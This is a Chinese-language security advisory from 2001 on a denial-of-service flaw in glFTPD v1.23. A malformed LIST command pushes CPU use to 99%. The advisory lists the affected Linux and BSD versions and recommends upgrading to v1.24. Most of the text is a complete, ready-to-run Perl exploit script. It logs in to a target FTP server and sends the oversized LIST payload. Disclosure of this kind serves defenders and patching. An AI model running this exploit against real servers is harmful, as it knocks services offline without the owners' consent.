glFTPD v1.23 存在拒绝攻击攻击发布时间:2001-08-18 更新时间:2001-08-18 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 glFTPD for Linux v1.23 / glFTPD BSD v1.23 *bins详细描述 glFTPD v1.23 接受到畸形的"LIST"命令可以导致CPU利用率达99%,造成 一定程度的拒绝服务攻击。 测试代码 <gl123DOS.pl> #!/usr/bin/perl use IO::Socket; use Socket; print "-= ASGUARD LABS EXPLOIT - glFTPD v1.23i =-\n\n"; if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl gl123DOS.pl <host> <user> <pass> [port]\n" }; if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" }; $adr = $ARGV[0]; $usr = $ARGV[1]; $pas = $ARGV[2]; $err = "*" x 256; $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr, PeerPort=>$prt, Reuse=>1) or die "Error: can't connect to $adr:$prt\n"; $remote->autoflush(1); print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die "Error: can't send user\n"; print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die "Error: can't send pass\n"; print $remote "LIST $err/\n" and print "3. Sending : ErrorCode...\n\n"or die "Error: can't send error code\n"; print "Attack done. press any key to exit\nnote: Attack done doesn't mean Attack successful\n"; $bla= <STDIN>; close $remote; 解决方案 请升级到v1.24 版本。 相关信息 |
